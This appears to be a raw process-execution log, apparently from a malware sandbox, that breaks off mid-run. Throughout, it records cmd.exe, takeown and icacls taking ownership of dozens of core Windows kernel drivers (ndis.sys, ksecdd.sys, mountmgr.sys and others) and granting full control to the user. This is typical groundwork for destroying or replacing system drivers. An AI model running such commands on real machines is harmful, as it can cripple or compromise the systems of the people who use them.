takeown /f C:\Windows\System32\drivers\IntelTA.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\IPMIDrv.sys && icacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iorate.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\intelppm.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipnat.sys && icacls C:\Windows\System32\drivers\ipnat.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\IntelTA.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ipfltdrv.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iorate.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\IPMIDrv.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipt.sys && icacls C:\Windows\System32\drivers\ipt.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\isapnp.sys && icacls C:\Windows\System32\drivers\isapnp.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ipnat.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ItSas35i.sys && icacls C:\Windows\System32\drivers\ItSas35i.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ipt.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdclass.sys && icacls C:\Windows\System32\drivers\kbdclass.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ipnat.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdhid.sys && icacls C:\Windows\System32\drivers\kbdhid.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ipt.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\isapnp.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbldfltr.sys && icacls C:\Windows\System32\drivers\kbldfltr.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ItSas35i.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\isapnp.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kdnic.sys && icacls C:\Windows\System32\drivers\kdnic.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\kbdclass.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\kbdhid.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\KNetPwrDepBroker.sys && icacls C:\Windows\System32\drivers\KNetPwrDepBroker.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ItSas35i.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ks.sys && icacls C:\Windows\System32\drivers\ks.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecdd.sys && icacls C:\Windows\System32\drivers\ksecdd.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\kbdclass.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\kbldfltr.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\kbdhid.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\kbldfltr.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\kdnic.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecpkg.sys && icacls C:\Windows\System32\drivers\ksecpkg.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\kdnic.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksthunk.sys && icacls C:\Windows\System32\drivers\ksthunk.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\KNetPwrDepBroker.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ks.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ksecdd.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lltdio.sys && icacls C:\Windows\System32\drivers\lltdio.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ks.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ksecdd.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas.sys && icacls C:\Windows\System32\drivers\lsi_sas.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\KNetPwrDepBroker.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ksthunk.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas2i.sys && icacls C:\Windows\System32\drivers\lsi_sas2i.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ksecpkg.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ksthunk.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas3i.sys && icacls C:\Windows\System32\drivers\lsi_sas3i.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sss.sys && icacls C:\Windows\System32\drivers\lsi_sss.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ksecpkg.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\lltdio.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\lsi_sas.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\lsi_sas2i.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\luafv.sys && icacls C:\Windows\System32\drivers\luafv.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\lsi_sas2i.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\lsi_sas.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\lsi_sas3i.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\lltdio.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mausbhost.sys && icacls C:\Windows\System32\drivers\mausbhost.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\lsi_sss.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\lsi_sas3i.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mausbip.sys && icacls C:\Windows\System32\drivers\mausbip.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\luafv.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\lsi_sss.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MbbCx.sys && icacls C:\Windows\System32\drivers\MbbCx.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mausbhost.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\luafv.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mcd.sys && icacls C:\Windows\System32\drivers\mcd.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mausbip.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mausbhost.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\megasas.sys && icacls C:\Windows\System32\drivers\megasas.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\MbbCx.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MegaSas2i.sys && icacls C:\Windows\System32\drivers\MegaSas2i.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mcd.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mausbip.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\MbbCx.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\megasas35i.sys && icacls C:\Windows\System32\drivers\megasas35i.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mcd.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\megasr.sys && icacls C:\Windows\System32\drivers\megasr.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\megasas.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Microsoft.Bluetooth.AvrcpTransport.sys && icacls C:\Windows\System32\drivers\Microsoft.Bluetooth.AvrcpTransport.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\MegaSas2i.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\megasas35i.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Microsoft.Bluetooth.Legacy.LEEnumerator.sys && icacls C:\Windows\System32\drivers\Microsoft.Bluetooth.Legacy.LEEnumerator.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\megasas.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\MegaSas2i.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\megasas35i.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mlx4_bus.sys && icacls C:\Windows\System32\drivers\mlx4_bus.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\megasr.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\Microsoft.Bluetooth.AvrcpTransport.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mmcss.sys && icacls C:\Windows\System32\drivers\mmcss.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\Microsoft.Bluetooth.Legacy.LEEnumerator.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\megasr.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\modem.sys && icacls C:\Windows\System32\drivers\modem.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\Microsoft.Bluetooth.AvrcpTransport.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mlx4_bus.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\monitor.sys && icacls C:\Windows\System32\drivers\monitor.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\Microsoft.Bluetooth.Legacy.LEEnumerator.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mmcss.sys
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouclass.sys && icacls C:\Windows\System32\drivers\mouclass.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mlx4_bus.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mmcss.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouhid.sys && icacls C:\Windows\System32\drivers\mouhid.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mountmgr.sys && icacls C:\Windows\System32\drivers\mountmgr.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\modem.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpsdrv.sys && icacls C:\Windows\System32\drivers\mpsdrv.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxdav.sys && icacls C:\Windows\System32\drivers\mrxdav.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\modem.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb.sys && icacls C:\Windows\System32\drivers\mrxsmb.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb20.sys && icacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mouclass.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\monitor.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mouhid.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\monitor.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mouhid.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msfs.sys && icacls C:\Windows\System32\drivers\msfs.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mouclass.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msgpioclx.sys && icacls C:\Windows\System32\drivers\msgpioclx.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mountmgr.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mpsdrv.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mrxdav.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mrxsmb.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msgpiowin32.sys && icacls C:\Windows\System32\drivers\msgpiowin32.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mrxsmb.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mrxsmb20.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mountmgr.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mrxdav.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mshidkmdf.sys && icacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\msfs.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\msgpioclx.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mpsdrv.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mshidumdf.sys && icacls C:\Windows\System32\drivers\mshidumdf.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\msgpiowin32.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\msfs.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\msgpioclx.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mshwnclx.sys && icacls C:\Windows\System32\drivers\mshwnclx.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\msgpiowin32.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mshidkmdf.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msisadrv.sys && icacls C:\Windows\System32\drivers\msisadrv.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msiscsi.sys && icacls C:\Windows\System32\drivers\msiscsi.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mshidumdf.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mskssrv.sys && icacls C:\Windows\System32\drivers\mskssrv.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mshwnclx.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mslldp.sys && icacls C:\Windows\System32\drivers\mslldp.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mshidumdf.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\msisadrv.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspclock.sys && icacls C:\Windows\System32\drivers\mspclock.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\msiscsi.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspqm.sys && icacls C:\Windows\System32\drivers\mspqm.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mshwnclx.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\msisadrv.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mskssrv.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\msiscsi.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msquic.sys && icacls C:\Windows\System32\drivers\msquic.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mslldp.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mskssrv.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mspclock.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msrpc.sys && icacls C:\Windows\System32\drivers\msrpc.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mspclock.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mslldp.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mssmbios.sys && icacls C:\Windows\System32\drivers\mssmbios.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mstee.sys && icacls C:\Windows\System32\drivers\mstee.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\msquic.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mspqm.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MTConfig.sys && icacls C:\Windows\System32\drivers\MTConfig.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\msrpc.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mspqm.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\msquic.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mup.sys && icacls C:\Windows\System32\drivers\mup.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\msrpc.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mvumis.sys && icacls C:\Windows\System32\drivers\mvumis.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mstee.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mssmbios.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndfltr.sys && icacls C:\Windows\System32\drivers\ndfltr.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mssmbios.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\MTConfig.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndis.sys && icacls C:\Windows\System32\drivers\ndis.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mstee.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mup.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\MTConfig.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiscap.sys && icacls C:\Windows\System32\drivers\ndiscap.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mvumis.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ndfltr.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mvumis.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mup.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ndfltr.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NdisImPlatform.sys && icacls C:\Windows\System32\drivers\NdisImPlatform.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndistapi.sys && icacls C:\Windows\System32\drivers\ndistapi.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ndis.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndisuio.sys && icacls C:\Windows\System32\drivers\ndisuio.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ndiscap.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NdisVirtualBus.sys && icacls C:\Windows\System32\drivers\NdisVirtualBus.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\NdisImPlatform.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ndis.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ndiscap.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiswan.sys && icacls C:\Windows\System32\drivers\ndiswan.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NDKPing.sys && icacls C:\Windows\System32\drivers\NDKPing.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\NdisImPlatform.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndproxy.sys && icacls C:\Windows\System32\drivers\ndproxy.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ndistapi.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ndisuio.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\NdisVirtualBus.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Ndu.sys && icacls C:\Windows\System32\drivers\Ndu.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ndisuio.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NetAdapterCx.sys && icacls C:\Windows\System32\drivers\NetAdapterCx.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
